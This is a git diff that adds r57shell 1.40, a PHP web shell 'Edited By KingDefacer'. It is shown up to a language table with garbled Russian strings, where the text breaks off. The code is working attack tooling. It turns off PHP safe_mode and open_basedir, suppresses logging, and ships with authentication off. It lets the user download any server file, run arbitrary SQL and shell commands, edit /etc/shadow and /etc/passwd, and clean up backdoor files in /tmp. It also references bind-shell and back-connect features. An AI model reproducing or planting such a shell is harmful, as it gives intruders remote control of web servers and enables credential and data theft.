+echo '</table>'.$table_up3."</div></div><div align=center id='n'><font face=Verdana size=-2><b>o---[ r57shell - http-shell by RST/GHC | <a href=http://rst.void.ru>http://rst.void.ru</a> | <a href=http://ghc.ru>http://ghc.ru</a> | version ".$version." ]---o</b></font></div></td></tr></table>".$f;
+echo '</body></html>';
+?>
\ No newline at end of file
diff --git a/php/r57shell1.40.php b/php/r57shell1.40.php
new file mode 100644
index 0000000..90295ba
--- /dev/null
+++ b/php/r57shell1.40.php
@@ -0,0 +1,3301 @@
+<?
+
+$language='eng';
+
+$auth = 0;
+
+$name='8cd59f852a590eb0565c98356ecb0b84';
+$pass='8cd59f852a590eb0565c98356ecb0b84';
+
+error_reporting(0);
+
+@ini_restore("safe_mode");
+@ini_restore("open_basedir");
+@ini_restore("safe_mode_include_dir");
+@ini_restore("safe_mode_exec_dir");
+@ini_restore("disable_functions");
+@ini_restore("allow_url_fopen");
+
+@ini_set('error_log',NULL);
+@ini_set('log_errors',0);
+
+if((!@function_exists('ini_get')) || (@ini_get('open_basedir')!=NULL) || (@ini_get('safe_mode_include_dir')!=NULL)){$open_basedir=1;} else{$open_basedir=0;};
+
+define("starttime",@getmicrotime());
+set_magic_quotes_runtime(0);
+@set_time_limit(0);
+@ini_set('max_execution_time',0);
+@ini_set('output_buffering',0);
+$safe_mode = @ini_get('safe_mode');
+#if(@function_exists('ini_get')){$safe_mode = @ini_get('safe_mode');}else{$safe_mode=1;};
+$version = '1.40';
+if(@version_compare(@phpversion(), '4.1.0') == -1)
+ {
+ $_POST   = &$HTTP_POST_VARS;
+ $_GET    = &$HTTP_GET_VARS;
+ $_SERVER = &$HTTP_SERVER_VARS;
+ $_COOKIE = &$HTTP_COOKIE_VARS;
+ }
+if (@get_magic_quotes_gpc())
+ {
+ foreach ($_POST as $k=>$v)
+  {
+  $_POST[$k] = stripslashes($v);
+  }
+ foreach ($_COOKIE as $k=>$v)
+  {
+  $_COOKIE[$k] = stripslashes($v);
+  } 
+ }
+
+if($auth == 1) {
+if (!isset($_SERVER['PHP_AUTH_USER']) || md5($_SERVER['PHP_AUTH_USER'])!==$name || md5($_SERVER['PHP_AUTH_PW'])!==$pass)
+   {
+   header('WWW-Authenticate: Basic realm="HELLO!"');
+   header('HTTP/1.0 401 Unauthorized');
+   exit("<b>Access Denied</b>");
+   }
+}   
+$head = '
+<html>
+<head>
+<title>r57Shell Edited By KingDefacer</title>
+<meta http-equiv="Content-Type" content="text/html; charset=windows-1251">
+
+<STYLE>
+tr {
+BORDER-RIGHT:  #aaaaaa 1px solid;
+BORDER-TOP:    #eeeeee 1px solid;
+BORDER-LEFT:   #eeeeee 1px solid;
+BORDER-BOTTOM: #aaaaaa 1px solid;
+color: #000000;
+}
+td {
+BORDER-RIGHT:  #aaaaaa 1px solid;
+BORDER-TOP:    #eeeeee 1px solid;
+BORDER-LEFT:   #eeeeee 1px solid;
+BORDER-BOTTOM: #aaaaaa 1px solid;
+color: #000000;
+}
+.table1 {
+BORDER: 0px;
+BACKGROUND-COLOR: #D4D0C8;
+color: #000000;
+}
+.td1 {
+BORDER: 0px;
+font: 7pt Verdana;
+color: #000000;
+}
+.tr1 {
+BORDER: 0px;
+color: #000000;
+}
+table {
+BORDER:  #eeeeee 1px outset;
+BACKGROUND-COLOR: #D4D0C8;
+color: #000000;
+}
+input {
+BORDER-RIGHT:  #ffffff 1px solid;
+BORDER-TOP:    #999999 1px solid;
+BORDER-LEFT:   #999999 1px solid;
+BORDER-BOTTOM: #ffffff 1px solid;
+BACKGROUND-COLOR: #e4e0d8;
+font: 8pt Verdana;
+color: #000000;
+}
+select {
+BORDER-RIGHT:  #ffffff 1px solid;
+BORDER-TOP:    #999999 1px solid;
+BORDER-LEFT:   #999999 1px solid;
+BORDER-BOTTOM: #ffffff 1px solid;
+BACKGROUND-COLOR: #e4e0d8;
+font: 8pt Verdana;
+color: #000000;;
+}
+submit {
+BORDER:  buttonhighlight 2px outset;
+BACKGROUND-COLOR: #e4e0d8;
+width: 30%;
+color: #000000;
+}
+textarea {
+BORDER-RIGHT:  #ffffff 1px solid;
+BORDER-TOP:    #999999 1px solid;
+BORDER-LEFT:   #999999 1px solid;
+BORDER-BOTTOM: #ffffff 1px solid;
+BACKGROUND-COLOR: #e4e0d8;
+font: Fixedsys bold;
+color: #000000;
+}
+BODY {
+margin: 1px;
+color: #000000;
+background-color: #e4e0d8;
+}
+A:link {COLOR:red; TEXT-DECORATION: none}
+A:visited { COLOR:red; TEXT-DECORATION: none}
+A:active {COLOR:red; TEXT-DECORATION: none}
+A:hover {color:blue;TEXT-DECORATION: none}
+</STYLE>
+<script language=\'javascript\'>
+function hide_div(id)
+{
+  document.getElementById(id).style.display = \'none\';
+  document.cookie=id+\'=0;\';
+}
+function show_div(id)
+{
+  document.getElementById(id).style.display = \'block\';
+  document.cookie=id+\'=1;\';
+}
+function change_divst(id)
+{
+  if (document.getElementById(id).style.display == \'none\')
+    show_div(id);
+  else
+    hide_div(id);
+}
+
+
+</script>';
+class zipfile
+{
+    var $datasec      = array();
+    var $ctrl_dir     = array();
+    var $eof_ctrl_dir = "\x50\x4b\x05\x06\x00\x00\x00\x00";
+    var $old_offset   = 0;
+    function unix2DosTime($unixtime = 0) {
+        $timearray = ($unixtime == 0) ? getdate() : getdate($unixtime);
+        if ($timearray['year'] < 1980) {
+            $timearray['year']    = 1980;
+            $timearray['mon']     = 1;
+            $timearray['mday']    = 1;
+            $timearray['hours']   = 0;
+            $timearray['minutes'] = 0;
+            $timearray['seconds'] = 0;
+        } 
+        return (($timearray['year'] - 1980) << 25) | ($timearray['mon'] << 21) | ($timearray['mday'] << 16) |
+                ($timearray['hours'] << 11) | ($timearray['minutes'] << 5) | ($timearray['seconds'] >> 1);
+    } 
+    function addFile($data, $name, $time = 0)
+    {
+        $name     = str_replace('\\', '/', $name);
+        $dtime    = dechex($this->unix2DosTime($time));
+        $hexdtime = '\x' . $dtime[6] . $dtime[7]
+                  . '\x' . $dtime[4] . $dtime[5]
+                  . '\x' . $dtime[2] . $dtime[3]
+                  . '\x' . $dtime[0] . $dtime[1];
+        eval('$hexdtime = "' . $hexdtime . '";');
+        $fr   = "\x50\x4b\x03\x04";
+        $fr   .= "\x14\x00";            
+        $fr   .= "\x00\x00";            
+        $fr   .= "\x08\x00";            
+        $fr   .= $hexdtime;             
+        $unc_len = strlen($data);
+        $crc     = crc32($data);
+        $zdata   = gzcompress($data);
+        $zdata   = substr(substr($zdata, 0, strlen($zdata) - 4), 2);
+        $c_len   = strlen($zdata);
+        $fr      .= pack('V', $crc);             
+        $fr      .= pack('V', $c_len);           
+        $fr      .= pack('V', $unc_len);         
+        $fr      .= pack('v', strlen($name));    
+        $fr      .= pack('v', 0);                
+        $fr      .= $name;
+        $fr .= $zdata;
+        $this -> datasec[] = $fr;
+        $cdrec = "\x50\x4b\x01\x02";
+        $cdrec .= "\x00\x00";                
+        $cdrec .= "\x14\x00";                
+        $cdrec .= "\x00\x00";                
+        $cdrec .= "\x08\x00";                
+        $cdrec .= $hexdtime;                 
+        $cdrec .= pack('V', $crc);           
+        $cdrec .= pack('V', $c_len);         
+        $cdrec .= pack('V', $unc_len);       
+        $cdrec .= pack('v', strlen($name) ); 
+        $cdrec .= pack('v', 0 );             
+        $cdrec .= pack('v', 0 );             
+        $cdrec .= pack('v', 0 );             
+        $cdrec .= pack('v', 0 );             
+        $cdrec .= pack('V', 32 );            
+        $cdrec .= pack('V', $this -> old_offset );
+        $this -> old_offset += strlen($fr);
+        $cdrec .= $name;
+        $this -> ctrl_dir[] = $cdrec;
+    }
+    function file()
+    {
+        $data    = implode('', $this -> datasec);
+        $ctrldir = implode('', $this -> ctrl_dir);
+        return
+            $data .
+            $ctrldir .
+            $this -> eof_ctrl_dir .
+            pack('v', sizeof($this -> ctrl_dir)) .  
+            pack('v', sizeof($this -> ctrl_dir)) .  
+            pack('V', strlen($ctrldir)) .           
+            pack('V', strlen($data)) .              
+            "\x00\x00";              
+    }
+}
+
+function compress(&$filename,&$filedump,$compress)
+ {
+    global $content_encoding;
+    global $mime_type;
+    if ($compress == 'bzip' && @function_exists('bzcompress')) 
+     {
+        $filename  .= '.bz2';
+        $mime_type = 'application/x-bzip2';
+        $filedump = bzcompress($filedump);
+     } 
+     else if ($compress == 'gzip' && @function_exists('gzencode')) 
+     {
+        $filename  .= '.gz';
+        $content_encoding = 'x-gzip';
+        $mime_type = 'application/x-gzip';
+        $filedump = gzencode($filedump);
+     } 
+     else if ($compress == 'zip' && @function_exists('gzcompress')) 
+     {
+     $filename .= '.zip';
+        $mime_type = 'application/zip';
+        $zipfile = new zipfile();
+        $zipfile -> addFile($filedump, substr($filename, 0, -4));
+        $filedump = $zipfile -> file();
+     } 
+     else 
+     {
+     $mime_type = 'application/octet-stream';
+     }
+ }
+
+function moreread($temp){
+global $lang,$language;
+$str='';
+  if(@function_exists('fopen')&&@function_exists('feof')&&@function_exists('fgets')&&@function_exists('fclose')){
+   $ffile = @fopen($temp, "r");
+   while(!@feof($ffile)){$str .= @fgets($ffile);}
+   fclose($ffile);
+  }elseif(@function_exists('fopen')&&@function_exists('fread')&&@function_exists('fclose')&&@function_exists('filesize')){
+   $ffile = @fopen($temp, "r");
+   $str = @fread($ffile, @filesize($temp));
+   @fclose($ffile);
+  }elseif(@function_exists('file')){
+   $ffiles = @file ($temp);
+   foreach ($ffiles as $ffile) { $str .= $ffile; }
+  }elseif(@function_exists('file_get_contents')){
+   $str = @file_get_contents($temp);
+  }elseif(@function_exists('readfile')){
+   $str = @readfile($temp);
+  }else{echo $lang[$language.'_text56'];}
+return $str;
+}
+
+function readzlib($filename,$temp=''){
+global $lang,$language;
+$str='';
+  if(!$temp) {$temp=tempnam(@getcwd(), "copytemp");};
+  if(@copy("compress.zlib://".$filename, $temp)) {
+   $str = moreread($temp);
+  } else echo $lang[$language.'_text119'];
+  @unlink($temp);
+return $str;
+}
+
+function mailattach($to,$from,$subj,$attach)
+ {
+ $headers  = "From: $from\r\n";
+ $headers .= "MIME-Version: 1.0\r\n";
+ $headers .= "Content-Type: ".$attach['type'];
+ $headers .= "; name=\"".$attach['name']."\"\r\n";
+ $headers .= "Content-Transfer-Encoding: base64\r\n\r\n";
+ $headers .= chunk_split(base64_encode($attach['content']))."\r\n";
+ if(mail($to,$subj,"",$headers)) { return 1; }
+ return 0;
+ }
+class my_sql
+ {
+ var $host = 'localhost';
+ var $port = '';
+ var $user = '';
+ var $pass = '';
+ var $base = '';
+ var $db   = '';
+ var $connection;
+ var $res;        
+ var $error;      
+ var $rows;       
+ var $columns;     
+ var $num_rows;   
+ var $num_fields; 
+ var $dump;       
+ 
+ function connect()
+  {   
+  switch($this->db)
+     {
+   case 'MySQL': 
+    if(empty($this->port)) { $this->port = '3306'; }
+    if(!@function_exists('mysql_connect')) return 0;
+    $this->connection = @mysql_connect($this->host.':'.$this->port,$this->user,$this->pass);
+    if(is_resource($this->connection)) return 1;
+   break;
+     case 'MSSQL':
+      if(empty($this->port)) { $this->port = '1433'; }
+    if(!@function_exists('mssql_connect')) return 0;
+    $this->connection = @mssql_connect($this->host.','.$this->port,$this->user,$this->pass);
+      if($this->connection) return 1;
+     break;
+     case 'PostgreSQL':
+      if(empty($this->port)) { $this->port = '5432'; }
+      $str = "host='".$this->host."' port='".$this->port."' user='".$this->user."' password='".$this->pass."' dbname='".$this->base."'";
+      if(!@function_exists('pg_connect')) return 0;
+      $this->connection = @pg_connect($str);
+      if(is_resource($this->connection)) return 1;
+     break;
+     case 'Oracle':
+      if(!@function_exists('ocilogon')) return 0;
+      $this->connection = @ocilogon($this->user, $this->pass, $this->base);
+      if(is_resource($this->connection)) return 1;
+     break;
+     }
+    return 0;   
+  }
+  
+ function select_db()
+  {
+   switch($this->db)
+    {
+  case 'MySQL':
+   if(@mysql_select_db($this->base,$this->connection)) return 1;
+    break;
+    case 'MSSQL':
+   if(@mssql_select_db($this->base,$this->connection)) return 1;
+    break;
+    case 'PostgreSQL':
+     return 1;
+    break;
+    case 'Oracle':
+     return 1;
+    break;
+    }
+   return 0;  
+  }
+  
+ function query($query)
+  { 
+   $this->res=$this->error='';
+   switch($this->db)
+    {
+  case 'MySQL': 
+     if(false===($this->res=@mysql_query('/*'.chr(0).'*/'.$query,$this->connection))) 
+      { 
+      $this->error = @mysql_error($this->connection);
+      return 0;
+      } 
+     else if(is_resource($this->res)) { return 1; }                   
+     return 2;                                                          
+  break;
+    case 'MSSQL':
+     if(false===($this->res=@mssql_query($query,$this->connection))) 
+      {
+      $this->error = 'Query error';
+      return 0;
+      }
+      else if(@mssql_num_rows($this->res) > 0) { return 1; }
+     return 2;     
+    break;
+    case 'PostgreSQL':
+     if(false===($this->res=@pg_query($this->connection,$query)))
+      {
+      $this->error = @pg_last_error($this->connection);
+      return 0;
+      }
+      else if(@pg_num_rows($this->res) > 0) { return 1; }
+     return 2; 
+    break;
+    case 'Oracle':
+     if(false===($this->res=@ociparse($this->connection,$query)))
+      {
+      $this->error = 'Query parse error';
+      }
+     else 
+      { 
+      if(@ociexecute($this->res)) 
+       {
+       if(@ocirowcount($this->res) != 0) return 2;
+       return 1;
+       }
+      $error = @ocierror();
+      $this->error=$error['message']; 
+      }
+    break;
+    }
+  return 0;
+  }
+ function get_result()
+  { 
+   $this->rows=array();
+   $this->columns=array();
+   $this->num_rows=$this->num_fields=0;
+   switch($this->db)
+    {
+  case 'MySQL':
+   $this->num_rows=@mysql_num_rows($this->res);
+   $this->num_fields=@mysql_num_fields($this->res);
+   while(false !== ($this->rows[] = @mysql_fetch_assoc($this->res))); 
+   @mysql_free_result($this->res);
+   if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;}
+    break;
+    case 'MSSQL':
+   $this->num_rows=@mssql_num_rows($this->res);
+   $this->num_fields=@mssql_num_fields($this->res);    
+   while(false !== ($this->rows[] = @mssql_fetch_assoc($this->res)));
+   @mssql_free_result($this->res);
+   if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;};
+    break;
+    case 'PostgreSQL':
+   $this->num_rows=@pg_num_rows($this->res); 
+   $this->num_fields=@pg_num_fields($this->res);   
+   while(false !== ($this->rows[] = @pg_fetch_assoc($this->res)));
+   @pg_free_result($this->res);
+   if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;}
+    break;
+    case 'Oracle':
+     $this->num_fields=@ocinumcols($this->res);
+     while(false !== ($this->rows[] = @oci_fetch_assoc($this->res))) $this->num_rows++;
+     @ocifreestatement($this->res);
+     if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;}
+    break;
+    }
+   return 0; 
+  }
+ function dump($table)
+  { 
+   if(empty($table)) return 0;
+   $this->dump=array();
+   $this->dump[0] = '##';
+   $this->dump[1] = '## --------------------------------------- ';
+   $this->dump[2] = '##  Created: '.date ("d/m/Y H:i:s");
+   $this->dump[3] = '## Database: '.$this->base;
+   $this->dump[4] = '##    Table: '.$table;
+   $this->dump[5] = '## --------------------------------------- ';
+   switch($this->db)
+    {
+  case 'MySQL':
+   $this->dump[0] = '## MySQL dump';
+   if($this->query('/*'.chr(0).'*/ SHOW CREATE TABLE `'.$table.'`')!=1) return 0;
+   if(!$this->get_result()) return 0;
+   $this->dump[] = $this->rows[0]['Create Table'];
+     $this->dump[] = '## --------------------------------------- ';
+   if($this->query('/*'.chr(0).'*/ SELECT * FROM `'.$table.'`')!=1) return 0;
+   if(!$this->get_result()) return 0;
+   for($i=0;$i<$this->num_rows;$i++)
+    {
+      foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @mysql_real_escape_string($v);}
+    $this->dump[] = 'INSERT INTO `'.$table.'` (`'.@implode("`, `", $this->columns).'`) VALUES (\''.@implode("', '", $this->rows[$i]).'\');';
+    }
+    break;
+    case 'MSSQL':
+     $this->dump[0] = '## MSSQL dump';
+     if($this->query('SELECT * FROM '.$table)!=1) return 0;
+   if(!$this->get_result()) return 0;
+   for($i=0;$i<$this->num_rows;$i++)
+    {
+      foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @addslashes($v);}
+    $this->dump[] = 'INSERT INTO '.$table.' ('.@implode(", ", $this->columns).') VALUES (\''.@implode("', '", $this->rows[$i]).'\');';
+    }
+    break;
+    case 'PostgreSQL':
+     $this->dump[0] = '## PostgreSQL dump';
+     if($this->query('SELECT * FROM '.$table)!=1) return 0;
+   if(!$this->get_result()) return 0;
+   for($i=0;$i<$this->num_rows;$i++)
+    {
+      foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @addslashes($v);} 
+    $this->dump[] = 'INSERT INTO '.$table.' ('.@implode(", ", $this->columns).') VALUES (\''.@implode("', '", $this->rows[$i]).'\');';
+    } 
+    break;
+    case 'Oracle':
+      $this->dump[0] = '## ORACLE dump';
+      $this->dump[]  = '## under construction'; 
+    break;
+    default:
+     return 0;
+    break;
+    }
+   return 1; 
+  }
+ function close()
+  { 
+   switch($this->db)
+    {
+  case 'MySQL': 
+   @mysql_close($this->connection); 
+    break;
+    case 'MSSQL':
+     @mssql_close($this->connection);
+    break;
+    case 'PostgreSQL':
+     @pg_close($this->connection);
+    break;
+    case 'Oracle':
+     @oci_close($this->connection);
+    break;
+    }
+  }
+ function affected_rows()
+  { 
+   switch($this->db)
+    {
+  case 'MySQL':
+   return @mysql_affected_rows($this->res); 
+    break;
+    case 'MSSQL':
+     return @mssql_affected_rows($this->res);
+    break;
+    case 'PostgreSQL':
+     return @pg_affected_rows($this->res);
+    break;
+    case 'Oracle':
+     return @ocirowcount($this->res);
+    break;
+    default:
+     return 0;
+    break;
+    }
+  }
+ } 
+if(!empty($_POST['cmd']) && $_POST['cmd']=="download_file" && !empty($_POST['d_name']))
+ {
+  if($file=@fopen($_POST['d_name'],"r")){ $filedump = @fread($file,@filesize($_POST['d_name'])); @fclose($file); }
+  else if ($file=readzlib($_POST['d_name'])) { $filedump = $file; } else { err(1,$_POST['d_name']); $_POST['cmd']=""; }
+  if(isset($_POST['cmd'])) 
+   {
+    @ob_clean();
+    $filename = @basename($_POST['d_name']);
+    $content_encoding=$mime_type='';
+    compress($filename,$filedump,$_POST['compress']);
+    if (!empty($content_encoding)) { header('Content-Encoding: ' . $content_encoding); }
+    header("Content-type: ".$mime_type);
+    header("Content-disposition: attachment; filename=\"".$filename."\";");   
+    echo $filedump;
+    exit();
+   }
+ }
+if(isset($_GET['phpinfo'])) { echo @phpinfo(); echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; die(); }
+if (!empty($_POST['cmd']) && $_POST['cmd']=="db_query")
+ {
+ echo $head;
+ $sql = new my_sql();
+ $sql->db   = $_POST['db'];
+ $sql->host = $_POST['db_server'];
+ $sql->port = $_POST['db_port'];
+ $sql->user = $_POST['mysql_l'];
+ $sql->pass = $_POST['mysql_p'];
+ $sql->base = $_POST['mysql_db'];
+ $querys = @explode(';',$_POST['db_query']);
+ echo '<body bgcolor=#e4e0d8>';
+ if(!$sql->connect()) echo "<div align=center><font face=Verdana size=-2 color=red><b>Can't connect to SQL server</b></font></div>";
+  else 
+   {
+   if(!empty($sql->base)&&!$sql->select_db()) echo "<div align=center><font face=Verdana size=-2 color=red><b>Can't select database</b></font></div>";
+   else
+    {
+    foreach($querys as $num=>$query) 
+     {
+      if(strlen($query)>5)
+      {
+      echo "<font face=Verdana size=-2 color=green><b>Query#".$num." : ".htmlspecialchars($query,ENT_QUOTES)."</b></font><br>";
+      switch($sql->query($query))
+       {
+       case '0':
+       echo "<table width=100%><tr><td><font face=Verdana size=-2>Error : <b>".$sql->error."</b></font></td></tr></table>";
+       break;
+       case '1': 
+       if($sql->get_result())
+        {
+       echo "<table width=100%>";
+        foreach($sql->columns as $k=>$v) $sql->columns[$k] = htmlspecialchars($v,ENT_QUOTES);
+       $keys = @implode("&nbsp;</b></font></td><td bgcolor=#cccccc><font face=Verdana size=-2><b>&nbsp;", $sql->columns);
+        echo "<tr><td bgcolor=#cccccc><font face=Verdana size=-2><b>&nbsp;".$keys."&nbsp;</b></font></td></tr>";
+        for($i=0;$i<$sql->num_rows;$i++)
+         {
+         foreach($sql->rows[$i] as $k=>$v) $sql->rows[$i][$k] = htmlspecialchars($v,ENT_QUOTES);
+         $values = @implode("&nbsp;</font></td><td><font face=Verdana size=-2>&nbsp;",$sql->rows[$i]);
+         echo '<tr><td><font face=Verdana size=-2>&nbsp;'.$values.'&nbsp;</font></td></tr>';
+         }
+        echo "</table>"; 
+        }
+       break;
+       case '2':
+       $ar = $sql->affected_rows()?($sql->affected_rows()):('0'); 
+       echo "<table width=100%><tr><td><font face=Verdana size=-2>affected rows : <b>".$ar."</b></font></td></tr></table><br>";
+       break; 
+       }
+      }
+     }
+    }
+   }   
+ echo "<br><form name=form method=POST>";
+ echo in('hidden','db',0,$_POST['db']);
+ echo in('hidden','db_server',0,$_POST['db_server']);
+ echo in('hidden','db_port',0,$_POST['db_port']);
+ echo in('hidden','mysql_l',0,$_POST['mysql_l']);
+ echo in('hidden','mysql_p',0,$_POST['mysql_p']);
+ echo in('hidden','mysql_db',0,$_POST['mysql_db']);
+ echo in('hidden','cmd',0,'db_query');
+ echo "<div align=center>";
+ echo "<font face=Verdana size=-2><b>Base: </b><input type=text name=mysql_db value=\"".$sql->base."\"></font><br>";
+ echo "<textarea cols=65 rows=10 name=db_query>".(!empty($_POST['db_query'])?($_POST['db_query']):("SHOW DATABASES;\nSELECT * FROM user;"))."</textarea><br><input type=submit name=submit value=\" Run SQL query \"></div><br><br>"; 
+ echo "</form>";
+ echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; die();
+ }
+if(isset($_GET['delete']))
+ {
+   @unlink(__FILE__);
+ }
+if(isset($_GET['tmp']))
+ {
+   @unlink("/tmp/bdpl");
+   @unlink("/tmp/back");
+   @unlink("/tmp/bd");
+   @unlink("/tmp/bd.c");
+   @unlink("/tmp/dp");
+   @unlink("/tmp/dpc");
+   @unlink("/tmp/dpc.c");
+   @unlink("/tmp/prxpl");
+   @unlink("/tmp/grep.txt");
+ }
+if(isset($_GET['phpini']))
+{
+echo $head;
+function U_value($value)
+ {
+ if ($value == '') return '<i>no value</i>';
+ if (@is_bool($value)) return $value ? 'TRUE' : 'FALSE';
+ if ($value === null) return 'NULL';
+ if (@is_object($value)) $value = (array) $value;
+ if (@is_array($value))
+ {
+ @ob_start();
+ print_r($value);
+ $value = @ob_get_contents();
+ @ob_end_clean();
+ }
+ return U_wordwrap((string) $value);
+ }
+function U_wordwrap($str)
+ {
+ $str = @wordwrap(@htmlspecialchars($str), 100, '<wbr />', true);
+ return @preg_replace('!(&[^;]*)<wbr />([^;]*;)!', '$1$2<wbr />', $str);
+ }
+if (@function_exists('ini_get_all'))
+ {
+ $r = '';
+ echo '<table width=100%>', '<tr><td bgcolor=#cccccc><font face=Verdana size=-2 color=red><div align=center><b>Directive</b></div></font></td><td bgcolor=#cccccc><font face=Verdana size=-2 color=red><div align=center><b>Local Value</b></div></font></td><td bgcolor=#cccccc><font face=Verdana size=-2 color=red><div align=center><b>Master Value</b></div></font></td></tr>';
+ foreach (@ini_get_all() as $key=>$value)
+  {
+  $r .= '<tr><td>'.ws(3).'<font face=Verdana size=-2><b>'.$key.'</b></font></td><td><font face=Verdana size=-2><div align=center><b>'.U_value($value['local_value']).'</b></div></font></td><td><font face=Verdana size=-2><div align=center><b>'.U_value($value['global_value']).'</b></div></font></td></tr>';
+  }
+ echo $r;
+ echo '</table>';
+ }
+echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>";
+die();
+}
+if(isset($_GET['cpu']))
+ {
+   echo $head;
+   echo '<table width=100%><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2 color=red><b>CPU</b></font></div></td></tr></table><table width=100%>';
+   $cpuf = @file("cpuinfo");
+   if($cpuf)
+    {
+      $c = @sizeof($cpuf);
+      for($i=0;$i<$c;$i++)
+        {
+          $info = @explode(":",$cpuf[$i]);
+          if($info[1]==""){ $info[1]="---"; }
+          $r .= '<tr><td>'.ws(3).'<font face=Verdana size=-2><b>'.trim($info[0]).'</b></font></td><td><font face=Verdana size=-2><div align=center><b>'.trim($info[1]).'</b></div></font></td></tr>';
+        }
+      echo $r;
+    }
+   else
+    {
+      echo '<tr><td>'.ws(3).'<div align=center><font face=Verdana size=-2><b> --- </b></font></div></td></tr>';
+    }
+   echo '</table>';
+   echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>";
+   die();
+ }
+if(isset($_GET['mem']))
+ {
+   echo $head;
+   echo '<table width=100%><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2 color=red><b>MEMORY</b></font></div></td></tr></table><table width=100%>';
+   $memf = @file("meminfo");
+   if($memf)
+    {
+      $c = sizeof($memf);
+      for($i=0;$i<$c;$i++)
+        {
+          $info = explode(":",$memf[$i]);
+          if($info[1]==""){ $info[1]="---"; }
+          $r .= '<tr><td>'.ws(3).'<font face=Verdana size=-2><b>'.trim($info[0]).'</b></font></td><td><font face=Verdana size=-2><div align=center><b>'.trim($info[1]).'</b></div></font></td></tr>';
+        }
+      echo $r;
+    }
+   else
+    {
+      echo '<tr><td>'.ws(3).'<div align=center><font face=Verdana size=-2><b> --- </b></font></div></td></tr>';
+    }
+   echo '</table>';
+   echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>";
+   die();
+ }
+
+if(isset($_GET['dmesg(8)']))
+ {$_POST['cmd'] = 'dmesg(8)';}
+if(isset($_GET['free']))
+ {$_POST['cmd'] = 'free';}
+if(isset($_GET['vmstat']))
+ {$_POST['cmd'] = 'vmstat';}
+if(isset($_GET['lspci']))
+ {$_POST['cmd'] = 'lspci';}
+if(isset($_GET['lsdev']))
+ {$_POST['cmd'] = 'lsdev';}
+if(isset($_GET['procinfo']))
+ {$_POST['cmd']='cat /proc/cpuinfo';}
+if(isset($_GET['version']))
+ {$_POST['cmd']='cat /proc/version';}
+if(isset($_GET['interrupts']))
+ {$_POST['cmd']='cat /proc/interrupts';}
+if(isset($_GET['realise1']))
+ {$_POST['cmd'] = 'cat /etc/*realise';}
+if(isset($_GET['service']))
+ {$_POST['cmd'] = 'service --status-all';}
+if(isset($_GET['ifconfig']))
+ {$_POST['cmd'] = 'ifconfig';}
+if(isset($_GET['w']))
+ {$_POST['cmd'] = 'w';}
+if(isset($_GET['who']))
+ {$_POST['cmd'] = 'who';}
+if(isset($_GET['uptime']))
+ {$_POST['cmd'] = 'uptime';}
+if(isset($_GET['last']))
+ {$_POST['cmd'] = 'last -n 10';}
+if(isset($_GET['psaux']))
+ {$_POST['cmd'] = 'ps -aux';}
+if(isset($_GET['netstat']))
+ {$_POST['cmd'] = 'netstat -a';}
+if(isset($_GET['lsattr']))
+ {$_POST['cmd'] = 'lsattr -va';}
+if(isset($_GET['syslog']))
+ {$_POST['cmd']='edit_file';$_POST['e_name'] = '/etc/syslog.conf';}
+if(isset($_GET['fstab']))
+ {$_POST['cmd']='edit_file';$_POST['e_name'] = '/etc/fstab';}
+if(isset($_GET['fdisk']))
+ {$_POST['cmd'] = 'fdisk -l';}
+if(isset($_GET['df']))
+ {$_POST['cmd'] = 'df -h';}
+if(isset($_GET['realise2']))
+ {$_POST['cmd']='edit_file';$_POST['e_name'] = '/etc/issue.net';}
+if(isset($_GET['hosts']))
+ {$_POST['cmd']='edit_file';$_POST['e_name'] = '/etc/hosts';}
+if(isset($_GET['resolv']))
+ {$_POST['cmd']='edit_file';$_POST['e_name'] = '/etc/resolv.conf';}
+if(isset($_GET['systeminfo']))
+ {$_POST['cmd'] = 'systeminfo';}
+if(isset($_GET['shadow']))
+ {$_POST['cmd']='edit_file';$_POST['e_name'] = '/etc/shadow';}
+if(isset($_GET['passwd']))
+ {$_POST['cmd']='edit_file';$_POST['e_name'] = '/etc/passwd';}
+#if(isset($_GET['']))
+# {$_POST['cmd'] = '';}
+
+$lang=array(
+'ru_text1' =>'Aûïîë????à? êî?à??à',
+'ru_text2' =>'Aûïîë???è? êî?à?? ?à ???â???',
+'ru_text3' =>'Aûïîë?è?ü êî?à???',
+'ru_text4' =>'?à?î÷à? ?è??ê?î?è?',
+'ru_text5' =>'Cà???çêà ôàéëîâ ?à ???â??',
+'ru_text6' =>'Eîêàëü?ûé ôàéë',
+'ru_text7' =>'Aëèà?û',
+'ru_text8' =>'Aû???è?? àëèà?',
+'ru_butt1' =>'Aûïîë?è?ü',
+'ru_butt2' =>'Cà???çè?ü',
+'ru_text9' =>'I?ê?û?è? ïî??à è ï?èâ?çêà ??î ê /bin/bash',
+'ru_text10'=>'I?ê?û?ü ïî??',
+'ru_text11'=>'Ià?îëü ?ë? ?î???ïà',
+'ru_butt3' =>'I?ê?û?ü',
+'ru_text12'=>'back-connect',
+'ru_text13'=>'IP-à????',
+'ru_text14'=>'Iî??',
+'ru_butt4' =>'Aûïîë?è?ü',
+'ru_text15'=>'Cà???çêà ôàéëîâ ? ??àë???î?î ???â??à',
+'ru_text16'=>'E?ïîëüçîâà?ü',
+'ru_text17'=>'??àë???ûé ôàéë',
+'ru_text18'=>'Eîêàëü?ûé ôàéë',
+'ru_text19'=>'Exploits',
+'ru_text20'=>'E?ïîëüçîâà?ü',
+'ru_text21'=>'?îâî? è??',
+'ru_text22'=>'datapipe',
+'ru_text23'=>'Eîêàëü?ûé ïî??',
+'ru_text24'=>'??àë???ûé ?î??',
